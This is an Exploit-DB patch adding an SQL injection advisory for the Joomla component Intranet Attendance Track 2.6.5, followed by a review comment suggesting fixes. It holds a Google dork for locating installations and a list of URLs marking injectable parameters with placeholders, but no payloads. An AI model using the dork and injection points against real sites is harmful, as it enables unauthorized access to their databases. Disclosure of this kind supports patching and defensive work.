From 5d75646fa801b2a01e48320a71983f256b9b1273 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sun, 26 Feb 2017 05:01:19 +0000
Subject: [PATCH] DB: 2017-02-26 1 new exploits Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection
---
 files.csv | 1 +
 platforms/php/webapps/41456.txt | 27 +++++++++++++++++++++++++++
 2 files changed, 28 insertions(+)
 create mode 100755 platforms/php/webapps/41456.txt
diff --git a/files.csv b/files.csv
index 0dd7fd79a..ce6ff05ee 100644
--- a/files.csv
+++ b/files.csv
@@ -37372,3 +37372,4 @@ id,file,description,date,author,platform,type,port
 41452,platforms/php/webapps/41452.txt,"Joomla! Component Community Quiz 4.3.5 - SQL Injection",2017-02-24,"Ihsan Sencan",php,webapps,0
 41453,platforms/multiple/webapps/41453.html,"Apple WebKit 10.0.2 - 'Frame::setDocument' Universal Cross-Site Scripting",2017-02-24,"Google Security Research",multiple,webapps,0
 41455,platforms/php/webapps/41455.txt,"memcache-viewer - Cross-Site Scripting",2017-02-24,HaHwul,php,webapps,0
+41456,platforms/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",php,webapps,0
diff --git a/platforms/php/webapps/41456.txt b/platforms/php/webapps/41456.txt
new file mode 100755
index 000000000..7625db244
--- /dev/null
+++ b/platforms/php/webapps/41456.txt
@@ -0,0 +1,27 @@
+# # # # #
+# Exploit Title: Joomla! Component Intranet Attendance Track v2.6.5 - SQL Injection
+# Google Dork: inurl:index.php?option=com_intranet
+# Date: 25.02.2017
+# Vendor Homepage: http://thagatpam.in/
+# Software Buy: https://extensions.joomla.org/extensions/extension/clients-a-communities/communities/intranet-attendance-track/
+# Demo: http://demo4.thagatpam.in/
+# Version: 2.6.5
+# Tested on: Win7 x64, Kali Linux x64
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Mail : ihsan[@]ihsan[.]net
+# # # # #
+# SQL Injection/Exploit :
+# Login as regular user
+# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=3&year=[SQL]
+# http://localhost/[PATH]/index.php?option=com_intranet&view=calendar&month=[SQL]
+# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=2017-02-20&weekuptodate=[SQL]
+# http://localhost/[PATH]/index.php?option=com_intranet&view=weeklyattendance&layout=weeklypdf&userid=940&weekstartdate=[SQL]
+# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=8&year=[SQL]
+# http://localhost/[PATH]/index.php?option=com_intranet&view=payslip&layout=mypayslip&user=940&month=[SQL]
+# http://localhost/[PATH]/index.php?option=com_intranet&controller=promociones&task=landing&idPromocion=[SQL]
+# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=20&rutaDestino=[SQL]
+# http://localhost/[PATH]/index.php?option=com_intranet&controller=reservas&task=paso1&tipoIdaVuelta=1&rutaSalida=[SQL]
+# Etc..
+# # # # #
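Review bot: The entry names the injectable parameters but records neither a fixed version nor a vendor response, so a reader cannot tell whether 2.6.5 is the last affected release; a line such as `# Fixed in: <version, or "no fix at publication">` after `# Version: 2.6.5` would settle that. The listed parameters (`month`, `year`, `weekstartdate`, `weekuptodate`, `idPromocion`, `rutaSalida`, `rutaDestino`) all appear to carry numbers or dates, so the remediation worth stating is integer casting or strict date-format validation together with bound query parameters. The last three URLs use `controller=promociones` and `controller=reservas`, which look unrelated to attendance tracking and may belong to a different component sharing the `com_intranet` name; that attribution should be confirmed before it is tied to this version. Because the list ends in `Etc..`, the affected surface is open-ended, and a defender reviewing this component should treat every request parameter that reaches a query as unvalidated until checked.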